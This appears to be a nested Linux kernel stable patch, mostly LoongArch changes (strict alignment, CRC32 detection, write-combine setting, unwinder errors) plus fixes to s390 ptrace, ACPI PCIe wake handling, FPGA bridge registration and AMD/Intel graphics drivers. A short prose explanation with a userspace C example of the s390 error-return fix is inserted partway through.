++ifdef CONFIG_ARCH_STRICT_ALIGN
+ # Don't emit unaligned accesses.
+ # Not all LoongArch cores support unaligned access, and as kernel we can't
+ # rely on others to provide emulation for these accesses.
+ KBUILD_CFLAGS += $(call cc-option,-mstrict-align)
++else
++# Optimise for performance on hardware that supports unaligned access.
++KBUILD_CFLAGS += $(call cc-option,-mno-strict-align)
++endif
+ 
+ KBUILD_CFLAGS += -isystem $(shell $(CC) -print-file-name=include)
+ 
+diff --git a/arch/loongarch/include/asm/acpi.h b/arch/loongarch/include/asm/acpi.h
+index 4198753aa1d0f..976a810352c60 100644
+--- a/arch/loongarch/include/asm/acpi.h
++++ b/arch/loongarch/include/asm/acpi.h
+@@ -41,8 +41,11 @@ extern void loongarch_suspend_enter(void);
+ 
+ static inline unsigned long acpi_get_wakeup_address(void)
+ {
++#ifdef CONFIG_SUSPEND
+ 	extern void loongarch_wakeup_start(void);
+ 	return (unsigned long)loongarch_wakeup_start;
++#endif
++	return 0UL;
+ }
+ 
+ #endif /* _ASM_LOONGARCH_ACPI_H */
+diff --git a/arch/loongarch/include/asm/cpu-features.h b/arch/loongarch/include/asm/cpu-features.h
+index b07974218393d..f6177f1334776 100644
+--- a/arch/loongarch/include/asm/cpu-features.h
++++ b/arch/loongarch/include/asm/cpu-features.h
+@@ -42,6 +42,7 @@
+ #define cpu_has_fpu		cpu_opt(LOONGARCH_CPU_FPU)
+ #define cpu_has_lsx		cpu_opt(LOONGARCH_CPU_LSX)
+ #define cpu_has_lasx		cpu_opt(LOONGARCH_CPU_LASX)
++#define cpu_has_crc32		cpu_opt(LOONGARCH_CPU_CRC32)
+ #define cpu_has_complex		cpu_opt(LOONGARCH_CPU_COMPLEX)
+ #define cpu_has_crypto		cpu_opt(LOONGARCH_CPU_CRYPTO)
+ #define cpu_has_lvz		cpu_opt(LOONGARCH_CPU_LVZ)
+diff --git a/arch/loongarch/include/asm/cpu.h b/arch/loongarch/include/asm/cpu.h
+index 754f285067913..9275770552636 100644
+--- a/arch/loongarch/include/asm/cpu.h
++++ b/arch/loongarch/include/asm/cpu.h
+@@ -78,25 +78,26 @@ enum cpu_type_enum {
+ #define CPU_FEATURE_FPU			3	/* CPU has FPU */
+ #define CPU_FEATURE_LSX			4	/* CPU has LSX (128-bit SIMD) */
+ #define CPU_FEATURE_LASX		5	/* CPU has LASX (256-bit SIMD) */
+-#define CPU_FEATURE_COMPLEX		6	/* CPU has Complex instructions */
+-#define CPU_FEATURE_CRYPTO		7	/* CPU has Crypto instructions */
+-#define CPU_FEATURE_LVZ			8	/* CPU has Virtualization extension */
+-#define CPU_FEATURE_LBT_X86		9	/* CPU has X86 Binary Translation */
+-#define CPU_FEATURE_LBT_ARM		10	/* CPU has ARM Binary Translation */
+-#define CPU_FEATURE_LBT_MIPS		11	/* CPU has MIPS Binary Translation */
+-#define CPU_FEATURE_TLB			12	/* CPU has TLB */
+-#define CPU_FEATURE_CSR			13	/* CPU has CSR */
+-#define CPU_FEATURE_WATCH		14	/* CPU has watchpoint registers */
+-#define CPU_FEATURE_VINT		15	/* CPU has vectored interrupts */
+-#define CPU_FEATURE_CSRIPI		16	/* CPU has CSR-IPI */
+-#define CPU_FEATURE_EXTIOI		17	/* CPU has EXT-IOI */
+-#define CPU_FEATURE_PREFETCH		18	/* CPU has prefetch instructions */
+-#define CPU_FEATURE_PMP			19	/* CPU has perfermance counter */
+-#define CPU_FEATURE_SCALEFREQ		20	/* CPU supports cpufreq scaling */
+-#define CPU_FEATURE_FLATMODE		21	/* CPU has flat mode */
+-#define CPU_FEATURE_EIODECODE		22	/* CPU has EXTIOI interrupt pin decode mode */
+-#define CPU_FEATURE_GUESTID		23	/* CPU has GuestID feature */
+-#define CPU_FEATURE_HYPERVISOR		24	/* CPU has hypervisor (running in VM) */
++#define CPU_FEATURE_CRC32		6	/* CPU has CRC32 instructions */
++#define CPU_FEATURE_COMPLEX		7	/* CPU has Complex instructions */
++#define CPU_FEATURE_CRYPTO		8	/* CPU has Crypto instructions */
++#define CPU_FEATURE_LVZ			9	/* CPU has Virtualization extension */
++#define CPU_FEATURE_LBT_X86		10	/* CPU has X86 Binary Translation */
++#define CPU_FEATURE_LBT_ARM		11	/* CPU has ARM Binary Translation */
++#define CPU_FEATURE_LBT_MIPS		12	/* CPU has MIPS Binary Translation */
++#define CPU_FEATURE_TLB			13	/* CPU has TLB */
++#define CPU_FEATURE_CSR			14	/* CPU has CSR */
++#define CPU_FEATURE_WATCH		15	/* CPU has watchpoint registers */
++#define CPU_FEATURE_VINT		16	/* CPU has vectored interrupts */
++#define CPU_FEATURE_CSRIPI		17	/* CPU has CSR-IPI */
++#define CPU_FEATURE_EXTIOI		18	/* CPU has EXT-IOI */
++#define CPU_FEATURE_PREFETCH		19	/* CPU has prefetch instructions */
++#define CPU_FEATURE_PMP			20	/* CPU has perfermance counter */
++#define CPU_FEATURE_SCALEFREQ		21	/* CPU supports cpufreq scaling */
++#define CPU_FEATURE_FLATMODE		22	/* CPU has flat mode */
++#define CPU_FEATURE_EIODECODE		23	/* CPU has EXTIOI interrupt pin decode mode */
++#define CPU_FEATURE_GUESTID		24	/* CPU has GuestID feature */
++#define CPU_FEATURE_HYPERVISOR		25	/* CPU has hypervisor (running in VM) */
+ 
+ #define LOONGARCH_CPU_CPUCFG		BIT_ULL(CPU_FEATURE_CPUCFG)
+ #define LOONGARCH_CPU_LAM		BIT_ULL(CPU_FEATURE_LAM)
+@@ -104,6 +105,7 @@ enum cpu_type_enum {
+ #define LOONGARCH_CPU_FPU		BIT_ULL(CPU_FEATURE_FPU)
+ #define LOONGARCH_CPU_LSX		BIT_ULL(CPU_FEATURE_LSX)
+ #define LOONGARCH_CPU_LASX		BIT_ULL(CPU_FEATURE_LASX)
++#define LOONGARCH_CPU_CRC32		BIT_ULL(CPU_FEATURE_CRC32)
+ #define LOONGARCH_CPU_COMPLEX		BIT_ULL(CPU_FEATURE_COMPLEX)
+ #define LOONGARCH_CPU_CRYPTO		BIT_ULL(CPU_FEATURE_CRYPTO)
+ #define LOONGARCH_CPU_LVZ		BIT_ULL(CPU_FEATURE_LVZ)
+diff --git a/arch/loongarch/include/asm/io.h b/arch/loongarch/include/asm/io.h
+index 402a7d9e3a53e..545e2708fbf70 100644
+--- a/arch/loongarch/include/asm/io.h
++++ b/arch/loongarch/include/asm/io.h
+@@ -54,8 +54,10 @@ static inline void __iomem *ioremap_prot(phys_addr_t offset, unsigned long size,
+  * @offset:    bus address of the memory
+  * @size:      size of the resource to map
+  */
++extern pgprot_t pgprot_wc;
++
+ #define ioremap_wc(offset, size)	\
+-	ioremap_prot((offset), (size), pgprot_val(PAGE_KERNEL_WUC))
++	ioremap_prot((offset), (size), pgprot_val(pgprot_wc))
+ 
+ #define ioremap_cache(offset, size)	\
+ 	ioremap_prot((offset), (size), pgprot_val(PAGE_KERNEL))
+diff --git a/arch/loongarch/include/asm/loongarch.h b/arch/loongarch/include/asm/loongarch.h
+index 7f8d57a61c8bd..62835d84a647d 100644
+--- a/arch/loongarch/include/asm/loongarch.h
++++ b/arch/loongarch/include/asm/loongarch.h
+@@ -117,7 +117,7 @@ static inline u32 read_cpucfg(u32 reg)
+ #define  CPUCFG1_EP			BIT(22)
+ #define  CPUCFG1_RPLV			BIT(23)
+ #define  CPUCFG1_HUGEPG			BIT(24)
+-#define  CPUCFG1_IOCSRBRD		BIT(25)
++#define  CPUCFG1_CRC32			BIT(25)
+ #define  CPUCFG1_MSGINT			BIT(26)
+ 
+ #define LOONGARCH_CPUCFG2		0x2
+diff --git a/arch/loongarch/include/asm/module.lds.h b/arch/loongarch/include/asm/module.lds.h
+index 438f09d4ccf41..88554f92e0103 100644
+--- a/arch/loongarch/include/asm/module.lds.h
++++ b/arch/loongarch/include/asm/module.lds.h
+@@ -2,8 +2,8 @@
+ /* Copyright (C) 2020-2022 Loongson Technology Corporation Limited */
+ SECTIONS {
+ 	. = ALIGN(4);
+-	.got : { BYTE(0) }
+-	.plt : { BYTE(0) }
+-	.plt.idx : { BYTE(0) }
+-	.ftrace_trampoline : { BYTE(0) }
++	.got 0 : { BYTE(0) }
++	.plt 0 : { BYTE(0) }
++	.plt.idx 0 : { BYTE(0) }
++	.ftrace_trampoline 0 : { BYTE(0) }
+ }
+diff --git a/arch/loongarch/kernel/Makefile b/arch/loongarch/kernel/Makefile
+index c8cfbd562921d..df5dbabfe7a6c 100644
+--- a/arch/loongarch/kernel/Makefile
++++ b/arch/loongarch/kernel/Makefile
+@@ -8,13 +8,15 @@ extra-y		:= vmlinux.lds
+ obj-y		+= head.o cpu-probe.o cacheinfo.o env.o setup.o entry.o genex.o \
+ 		   traps.o irq.o idle.o process.o dma.o mem.o io.o reset.o switch.o \
+ 		   elf.o syscall.o signal.o time.o topology.o inst.o ptrace.o vdso.o \
+-		   alternative.o unaligned.o unwind.o
++		   alternative.o unwind.o
+ 
+ obj-$(CONFIG_ACPI)		+= acpi.o
+ obj-$(CONFIG_EFI) 		+= efi.o
+ 
+ obj-$(CONFIG_CPU_HAS_FPU)	+= fpu.o
+ 
++obj-$(CONFIG_ARCH_STRICT_ALIGN)	+= unaligned.o
++
+ ifdef CONFIG_FUNCTION_TRACER
+   ifndef CONFIG_DYNAMIC_FTRACE
+     obj-y += mcount.o ftrace.o
+diff --git a/arch/loongarch/kernel/cpu-probe.c b/arch/loongarch/kernel/cpu-probe.c
+index 3a3fce2d78461..5adf0f736c6d7 100644
+--- a/arch/loongarch/kernel/cpu-probe.c
++++ b/arch/loongarch/kernel/cpu-probe.c
+@@ -60,7 +60,7 @@ static inline void set_elf_platform(int cpu, const char *plat)
+ 
+ /* MAP BASE */
+ unsigned long vm_map_base;
+-EXPORT_SYMBOL_GPL(vm_map_base);
++EXPORT_SYMBOL(vm_map_base);
+ 
+ static void cpu_probe_addrbits(struct cpuinfo_loongarch *c)
+ {
+@@ -94,13 +94,18 @@ static void cpu_probe_common(struct cpuinfo_loongarch *c)
+ 	c->options = LOONGARCH_CPU_CPUCFG | LOONGARCH_CPU_CSR |
+ 		     LOONGARCH_CPU_TLB | LOONGARCH_CPU_VINT | LOONGARCH_CPU_WATCH;
+ 
+-	elf_hwcap = HWCAP_LOONGARCH_CPUCFG | HWCAP_LOONGARCH_CRC32;
++	elf_hwcap = HWCAP_LOONGARCH_CPUCFG;
+ 
+ 	config = read_cpucfg(LOONGARCH_CPUCFG1);
+ 	if (config & CPUCFG1_UAL) {
+ 		c->options |= LOONGARCH_CPU_UAL;
+ 		elf_hwcap |= HWCAP_LOONGARCH_UAL;
+ 	}
++	if (config & CPUCFG1_CRC32) {
++		c->options |= LOONGARCH_CPU_CRC32;
++		elf_hwcap |= HWCAP_LOONGARCH_CRC32;
++	}
++
+ 
+ 	config = read_cpucfg(LOONGARCH_CPUCFG2);
+ 	if (config & CPUCFG2_LAM) {
+diff --git a/arch/loongarch/kernel/proc.c b/arch/loongarch/kernel/proc.c
+index 5c67cc4fd56d5..0d82907b5404c 100644
+--- a/arch/loongarch/kernel/proc.c
++++ b/arch/loongarch/kernel/proc.c
+@@ -76,6 +76,7 @@ static int show_cpuinfo(struct seq_file *m, void *v)
+ 	if (cpu_has_fpu)	seq_printf(m, " fpu");
+ 	if (cpu_has_lsx)	seq_printf(m, " lsx");
+ 	if (cpu_has_lasx)	seq_printf(m, " lasx");
++	if (cpu_has_crc32)	seq_printf(m, " crc32");
+ 	if (cpu_has_complex)	seq_printf(m, " complex");
+ 	if (cpu_has_crypto)	seq_printf(m, " crypto");
+ 	if (cpu_has_lvz)	seq_printf(m, " lvz");
+diff --git a/arch/loongarch/kernel/setup.c b/arch/loongarch/kernel/setup.c
+index 4344502c0b317..7ac1aecc76870 100644
+--- a/arch/loongarch/kernel/setup.c
++++ b/arch/loongarch/kernel/setup.c
+@@ -160,6 +160,27 @@ static void __init smbios_parse(void)
+ 	dmi_walk(find_tokens, NULL);
+ }
+ 
++#ifdef CONFIG_ARCH_WRITECOMBINE
++pgprot_t pgprot_wc = PAGE_KERNEL_WUC;
++#else
++pgprot_t pgprot_wc = PAGE_KERNEL_SUC;
++#endif
++
++EXPORT_SYMBOL(pgprot_wc);
++
++static int __init setup_writecombine(char *p)
++{
++	if (!strcmp(p, "on"))
++		pgprot_wc = PAGE_KERNEL_WUC;
++	else if (!strcmp(p, "off"))
++		pgprot_wc = PAGE_KERNEL_SUC;
++	else
++		pr_warn("Unknown writecombine setting \"%s\".\n", p);
++
++	return 0;
++}
++early_param("writecombine", setup_writecombine);
++
+ static int usermem __initdata;
+ 
+ static int __init early_parse_mem(char *p)
+diff --git a/arch/loongarch/kernel/stacktrace.c b/arch/loongarch/kernel/stacktrace.c
+index 3a690f96f00c1..2463d2fea21f5 100644
+--- a/arch/loongarch/kernel/stacktrace.c
++++ b/arch/loongarch/kernel/stacktrace.c
+@@ -30,7 +30,7 @@ void arch_stack_walk(stack_trace_consume_fn consume_entry, void *cookie,
+ 
+ 	regs->regs[1] = 0;
+ 	for (unwind_start(&state, task, regs);
+-	      !unwind_done(&state); unwind_next_frame(&state)) {
++	     !unwind_done(&state) && !unwind_error(&state); unwind_next_frame(&state)) {
+ 		addr = unwind_get_return_address(&state);
+ 		if (!addr || !consume_entry(cookie, addr))
+ 			break;
+diff --git a/arch/loongarch/kernel/traps.c b/arch/loongarch/kernel/traps.c
+index c38a146a973b4..05511203732c3 100644
+--- a/arch/loongarch/kernel/traps.c
++++ b/arch/loongarch/kernel/traps.c
+@@ -371,9 +371,14 @@ int no_unaligned_warning __read_mostly = 1;	/* Only 1 warning by default */
+ 
+ asmlinkage void noinstr do_ale(struct pt_regs *regs)
+ {
+-	unsigned int *pc;
+ 	irqentry_state_t state = irqentry_enter(regs);
+ 
++#ifndef CONFIG_ARCH_STRICT_ALIGN
++	die_if_kernel("Kernel ale access", regs);
++	force_sig_fault(SIGBUS, BUS_ADRALN, (void __user *)regs->csr_badvaddr);
++#else
++	unsigned int *pc;
++
+ 	perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, regs, regs->csr_badvaddr);
+ 
+ 	/*
+@@ -397,8 +402,8 @@ asmlinkage void noinstr do_ale(struct pt_regs *regs)
+ sigbus:
+ 	die_if_kernel("Kernel ale access", regs);
+ 	force_sig_fault(SIGBUS, BUS_ADRALN, (void __user *)regs->csr_badvaddr);
+-
+ out:
++#endif
+ 	irqentry_exit(regs, state);
+ }
+ 
+diff --git a/arch/loongarch/kernel/unwind.c b/arch/loongarch/kernel/unwind.c
+index a463d6961344c..ba324ba76fa15 100644
+--- a/arch/loongarch/kernel/unwind.c
++++ b/arch/loongarch/kernel/unwind.c
+@@ -28,5 +28,6 @@ bool default_next_frame(struct unwind_state *state)
+ 
+ 	} while (!get_stack_info(state->sp, state->task, info));
+ 
++	state->error = true;
+ 	return false;
+ }
+diff --git a/arch/loongarch/kernel/unwind_prologue.c b/arch/loongarch/kernel/unwind_prologue.c
+index 9095fde8e55d5..55afc27320e12 100644
+--- a/arch/loongarch/kernel/unwind_prologue.c
++++ b/arch/loongarch/kernel/unwind_prologue.c
+@@ -211,7 +211,7 @@ static bool next_frame(struct unwind_state *state)
+ 			pc = regs->csr_era;
+ 
+ 			if (user_mode(regs) || !__kernel_text_address(pc))
+-				return false;
++				goto out;
+ 
+ 			state->first = true;
+ 			state->pc = pc;
+@@ -226,6 +226,8 @@ static bool next_frame(struct unwind_state *state)
+ 
+ 	} while (!get_stack_info(state->sp, state->task, info));
+ 
++out:
++	state->error = true;
+ 	return false;
+ }
+ 
+diff --git a/arch/loongarch/mm/init.c b/arch/loongarch/mm/init.c
+index e018aed345866..3b7d8129570b8 100644
+--- a/arch/loongarch/mm/init.c
++++ b/arch/loongarch/mm/init.c
+@@ -41,7 +41,7 @@
+  * don't have to care about aliases on other CPUs.
+  */
+ unsigned long empty_zero_page, zero_page_mask;
+-EXPORT_SYMBOL_GPL(empty_zero_page);
++EXPORT_SYMBOL(empty_zero_page);
+ EXPORT_SYMBOL(zero_page_mask);
+ 
+ void setup_zero_pages(void)
+@@ -270,7 +270,7 @@ pud_t invalid_pud_table[PTRS_PER_PUD] __page_aligned_bss;
+ #endif
+ #ifndef __PAGETABLE_PMD_FOLDED
+ pmd_t invalid_pmd_table[PTRS_PER_PMD] __page_aligned_bss;
+-EXPORT_SYMBOL_GPL(invalid_pmd_table);
++EXPORT_SYMBOL(invalid_pmd_table);
+ #endif
+ pte_t invalid_pte_table[PTRS_PER_PTE] __page_aligned_bss;
+ EXPORT_SYMBOL(invalid_pte_table);
+diff --git a/arch/mips/kernel/vmlinux.lds.S b/arch/mips/kernel/vmlinux.lds.S
+index 1f98947fe715d..91d6a5360bb9c 100644
+--- a/arch/mips/kernel/vmlinux.lds.S
++++ b/arch/mips/kernel/vmlinux.lds.S
+@@ -15,6 +15,8 @@
+ #define EMITS_PT_NOTE
+ #endif
+ 
++#define RUNTIME_DISCARD_EXIT
++
+ #include <asm-generic/vmlinux.lds.h>
+ 
+ #undef mips
+diff --git a/arch/riscv/purgatory/Makefile b/arch/riscv/purgatory/Makefile
+index dd58e1d993972..659e21862077b 100644
+--- a/arch/riscv/purgatory/Makefile
++++ b/arch/riscv/purgatory/Makefile
+@@ -74,9 +74,7 @@ CFLAGS_string.o			+= $(PURGATORY_CFLAGS)
+ CFLAGS_REMOVE_ctype.o		+= $(PURGATORY_CFLAGS_REMOVE)
+ CFLAGS_ctype.o			+= $(PURGATORY_CFLAGS)
+ 
+-AFLAGS_REMOVE_entry.o		+= -Wa,-gdwarf-2
+-AFLAGS_REMOVE_memcpy.o		+= -Wa,-gdwarf-2
+-AFLAGS_REMOVE_memset.o		+= -Wa,-gdwarf-2
++asflags-remove-y		+= $(foreach x, -g -gdwarf-4 -gdwarf-5, $(x) -Wa,$(x))
+ 
+ $(obj)/purgatory.ro: $(PURGATORY_OBJS) FORCE
+ 		$(call if_changed,ld)
+diff --git a/arch/s390/kernel/ptrace.c b/arch/s390/kernel/ptrace.c
+index 53e0209229f87..092b16b4dd4f6 100644
+--- a/arch/s390/kernel/ptrace.c
++++ b/arch/s390/kernel/ptrace.c
+@@ -474,9 +474,7 @@ long arch_ptrace(struct task_struct *child, long request,
+ 		}
+ 		return 0;
+ 	case PTRACE_GET_LAST_BREAK:
+-		put_user(child->thread.last_break,
+-			 (unsigned long __user *) data);
+-		return 0;
++		return put_user(child->thread.last_break, (unsigned long __user *)data);
+ 	case PTRACE_ENABLE_TE:
+ 		if (!MACHINE_HAS_TE)
+ 			return -EIO;
+@@ -824,9 +822,7 @@ long compat_arch_ptrace(struct task_struct *child, compat_long_t request,
+ 		}
+ 		return 0;
+ 	case PTRACE_GET_LAST_BREAK:
+-		put_user(child->thread.last_break,
+-			 (unsigned int __user *) data);
+-		return 0;
++		return put_user(child->thread.last_break, (unsigned int __user *)data);
+ 	}
+ 	return compat_ptrace_request(child, request, addr, data);
+ }
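
The s390 ptrace hunks above stop discarding put_user()'s result, so a faulting user pointer now yields -EFAULT instead of a silent 0. A minimal userspace sketch of the same pattern follows; copy_out() and handle_request() are invented stand-ins for put_user() and the PTRACE_GET_LAST_BREAK case, not kernel APIs:

	#include <errno.h>
	#include <stdio.h>
	#include <string.h>

	/* Hypothetical stand-in for put_user(): fails on a NULL destination. */
	static int copy_out(unsigned long val, unsigned long *dst)
	{
		if (!dst)
			return -EFAULT;
		memcpy(dst, &val, sizeof(val));
		return 0;
	}

	/* Propagate the helper's result instead of unconditionally returning 0. */
	static long handle_request(unsigned long last_break, unsigned long *data)
	{
		return copy_out(last_break, data);
	}

	int main(void)
	{
		unsigned long out;

		printf("ok: %ld\n", handle_request(42, &out));  /* 0 */
		printf("bad: %ld\n", handle_request(42, NULL)); /* -14 (-EFAULT) */
		return 0;
	}
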
+diff --git a/arch/x86/purgatory/Makefile b/arch/x86/purgatory/Makefile
+index 17f09dc263811..82fec66d46d29 100644
+--- a/arch/x86/purgatory/Makefile
++++ b/arch/x86/purgatory/Makefile
+@@ -69,8 +69,7 @@ CFLAGS_sha256.o			+= $(PURGATORY_CFLAGS)
+ CFLAGS_REMOVE_string.o		+= $(PURGATORY_CFLAGS_REMOVE)
+ CFLAGS_string.o			+= $(PURGATORY_CFLAGS)
+ 
+-AFLAGS_REMOVE_setup-x86_$(BITS).o	+= -Wa,-gdwarf-2
+-AFLAGS_REMOVE_entry64.o			+= -Wa,-gdwarf-2
++asflags-remove-y		+= $(foreach x, -g -gdwarf-4 -gdwarf-5, $(x) -Wa,$(x))
+ 
+ $(obj)/purgatory.ro: $(PURGATORY_OBJS) FORCE
+ 		$(call if_changed,ld)
+diff --git a/drivers/acpi/acpica/evevent.c b/drivers/acpi/acpica/evevent.c
+index 82d1728b9bc6a..df596d46dd974 100644
+--- a/drivers/acpi/acpica/evevent.c
++++ b/drivers/acpi/acpica/evevent.c
+@@ -142,9 +142,6 @@ static acpi_status acpi_ev_fixed_event_initialize(void)
+ 			status =
+ 			    acpi_write_bit_register(acpi_gbl_fixed_event_info
+ 						    [i].enable_register_id,
+-						    (i ==
+-						     ACPI_EVENT_PCIE_WAKE) ?
+-						    ACPI_ENABLE_EVENT :
+ 						    ACPI_DISABLE_EVENT);
+ 			if (ACPI_FAILURE(status)) {
+ 				return (status);
+@@ -188,11 +185,6 @@ u32 acpi_ev_fixed_event_detect(void)
+ 		return (int_status);
+ 	}
+ 
+-	if (fixed_enable & ACPI_BITMASK_PCIEXP_WAKE_DISABLE)
+-		fixed_enable &= ~ACPI_BITMASK_PCIEXP_WAKE_DISABLE;
+-	else
+-		fixed_enable |= ACPI_BITMASK_PCIEXP_WAKE_DISABLE;
+-
+ 	ACPI_DEBUG_PRINT((ACPI_DB_INTERRUPTS,
+ 			  "Fixed Event Block: Enable %08X Status %08X\n",
+ 			  fixed_enable, fixed_status));
+@@ -258,9 +250,6 @@ static u32 acpi_ev_fixed_event_dispatch(u32 event)
+ 	if (!acpi_gbl_fixed_event_handlers[event].handler) {
+ 		(void)acpi_write_bit_register(acpi_gbl_fixed_event_info[event].
+ 					      enable_register_id,
+-					      (event ==
+-					       ACPI_EVENT_PCIE_WAKE) ?
+-					      ACPI_ENABLE_EVENT :
+ 					      ACPI_DISABLE_EVENT);
+ 
+ 		ACPI_ERROR((AE_INFO,
+diff --git a/drivers/acpi/acpica/hwsleep.c b/drivers/acpi/acpica/hwsleep.c
+index 37b3f641feaab..bd936476dda96 100644
+--- a/drivers/acpi/acpica/hwsleep.c
++++ b/drivers/acpi/acpica/hwsleep.c
+@@ -311,20 +311,6 @@ acpi_status acpi_hw_legacy_wake(u8 sleep_state)
+ 				    [ACPI_EVENT_SLEEP_BUTTON].
+ 				    status_register_id, ACPI_CLEAR_STATUS);
+ 
+-	/* Enable pcie wake event if support */
+-	if ((acpi_gbl_FADT.flags & ACPI_FADT_PCI_EXPRESS_WAKE)) {
+-		(void)
+-		    acpi_write_bit_register(acpi_gbl_fixed_event_info
+-					    [ACPI_EVENT_PCIE_WAKE].
+-					    enable_register_id,
+-					    ACPI_DISABLE_EVENT);
+-		(void)
+-		    acpi_write_bit_register(acpi_gbl_fixed_event_info
+-					    [ACPI_EVENT_PCIE_WAKE].
+-					    status_register_id,
+-					    ACPI_CLEAR_STATUS);
+-	}
+-
+ 	acpi_hw_execute_sleep_method(METHOD_PATHNAME__SST, ACPI_SST_WORKING);
+ 	return_ACPI_STATUS(status);
+ }
+diff --git a/drivers/acpi/acpica/utglobal.c b/drivers/acpi/acpica/utglobal.c
+index 53afa5edb6ecb..cda6e16dddf78 100644
+--- a/drivers/acpi/acpica/utglobal.c
++++ b/drivers/acpi/acpica/utglobal.c
+@@ -186,10 +186,6 @@ struct acpi_fixed_event_info acpi_gbl_fixed_event_info[ACPI_NUM_FIXED_EVENTS] =
+ 					ACPI_BITREG_RT_CLOCK_ENABLE,
+ 					ACPI_BITMASK_RT_CLOCK_STATUS,
+ 					ACPI_BITMASK_RT_CLOCK_ENABLE},
+-	/* ACPI_EVENT_PCIE_WAKE     */ {ACPI_BITREG_PCIEXP_WAKE_STATUS,
+-					ACPI_BITREG_PCIEXP_WAKE_DISABLE,
+-					ACPI_BITMASK_PCIEXP_WAKE_STATUS,
+-					ACPI_BITMASK_PCIEXP_WAKE_DISABLE},
+ };
+ #endif				/* !ACPI_REDUCED_HARDWARE */
+ 
+diff --git a/drivers/fpga/fpga-bridge.c b/drivers/fpga/fpga-bridge.c
+index 727704431f618..13918c8c839ea 100644
+--- a/drivers/fpga/fpga-bridge.c
++++ b/drivers/fpga/fpga-bridge.c
+@@ -360,7 +360,6 @@ fpga_bridge_register(struct device *parent, const char *name,
+ 	bridge->dev.parent = parent;
+ 	bridge->dev.of_node = parent->of_node;
+ 	bridge->dev.id = id;
+-	of_platform_populate(bridge->dev.of_node, NULL, NULL, &bridge->dev);
+ 
+ 	ret = dev_set_name(&bridge->dev, "br%d", id);
+ 	if (ret)
+@@ -372,6 +371,8 @@ fpga_bridge_register(struct device *parent, const char *name,
+ 		return ERR_PTR(ret);
+ 	}
+ 
++	of_platform_populate(bridge->dev.of_node, NULL, NULL, &bridge->dev);
++
+ 	return bridge;
+ 
+ error_device:
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c
+index a6aef488a8228..c8413470e057f 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c
+@@ -597,6 +597,9 @@ int amdgpu_irq_put(struct amdgpu_device *adev, struct amdgpu_irq_src *src,
+ 	if (!src->enabled_types || !src->funcs->set)
+ 		return -EINVAL;
+ 
++	if (WARN_ON(!amdgpu_irq_enabled(adev, src, type)))
++		return -EINVAL;
++
+ 	if (atomic_dec_and_test(&src->enabled_types[type]))
+ 		return amdgpu_irq_update(adev, src, type);
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
+index 78c2ed59e87d2..ad8fac86dc70a 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
+@@ -170,10 +170,21 @@ static inline int dm_set_vblank(struct drm_crtc *crtc, bool enable)
+ 	if (rc)
+ 		return rc;
+ 
+-	irq_source = IRQ_TYPE_VBLANK + acrtc->otg_inst;
++	if (amdgpu_in_reset(adev)) {
++		irq_source = IRQ_TYPE_VBLANK + acrtc->otg_inst;
++		/* During gpu-reset we disable and then enable vblank irq, so
++		 * don't use amdgpu_irq_get/put() to avoid refcount change.
++		 */
++		if (!dc_interrupt_set(adev->dm.dc, irq_source, enable))
++			rc = -EBUSY;
++	} else {
++		rc = (enable)
++			? amdgpu_irq_get(adev, &adev->crtc_irq, acrtc->crtc_id)
++			: amdgpu_irq_put(adev, &adev->crtc_irq, acrtc->crtc_id);
++	}
+ 
+-	if (!dc_interrupt_set(adev->dm.dc, irq_source, enable))
+-		return -EBUSY;
++	if (rc)
++		return rc;
+ 
+ skip:
+ 	if (amdgpu_in_reset(adev))
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c
+index b37d14369a622..59836570603ac 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c
+@@ -222,7 +222,7 @@ struct _vcs_dpi_ip_params_st dcn3_15_ip = {
+ 	.maximum_dsc_bits_per_component = 10,
+ 	.dsc422_native_support = false,
+ 	.is_line_buffer_bpp_fixed = true,
+-	.line_buffer_fixed_bpp = 49,
++	.line_buffer_fixed_bpp = 48,
+ 	.line_buffer_size_bits = 789504,
+ 	.max_line_buffer_lines = 12,
+ 	.writeback_interface_buffer_size_kbytes = 90,
+diff --git a/drivers/gpu/drm/drm_buddy.c b/drivers/gpu/drm/drm_buddy.c
+index 3d1f50f481cfd..7098f125b54a9 100644
+--- a/drivers/gpu/drm/drm_buddy.c
++++ b/drivers/gpu/drm/drm_buddy.c
+@@ -146,8 +146,8 @@ int drm_buddy_init(struct drm_buddy *mm, u64 size, u64 chunk_size)
+ 		unsigned int order;
+ 		u64 root_size;
+ 
+-		root_size = rounddown_pow_of_two(size);
+-		order = ilog2(root_size) - ilog2(chunk_size);
++		order = ilog2(size) - ilog2(chunk_size);
++		root_size = chunk_size << order;
+ 
+ 		root = drm_block_alloc(mm, NULL, order, offset);
+ 		if (!root)
+diff --git a/drivers/gpu/drm/i915/display/intel_dp_aux.c b/drivers/gpu/drm/i915/display/intel_dp_aux.c
+index 664bebdecea76..d5fed2eb66d2b 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp_aux.c
++++ b/drivers/gpu/drm/i915/display/intel_dp_aux.c
+@@ -166,7 +166,7 @@ static u32 skl_get_aux_send_ctl(struct intel_dp *intel_dp,
+ 	      DP_AUX_CH_CTL_TIME_OUT_MAX |
+ 	      DP_AUX_CH_CTL_RECEIVE_ERROR |
+ 	      (send_bytes << DP_AUX_CH_CTL_MESSAGE_SIZE_SHIFT) |
+-	      DP_AUX_CH_CTL_FW_SYNC_PULSE_SKL(32) |
++	      DP_AUX_CH_CTL_FW_SYNC_PULSE_SKL(24) |
+ 	      DP_AUX_CH_CTL_SYNC_PULSE_SKL(32);
+ 
+ 	if (intel_tc_port_in_tbt_alt_mode(dig_port))
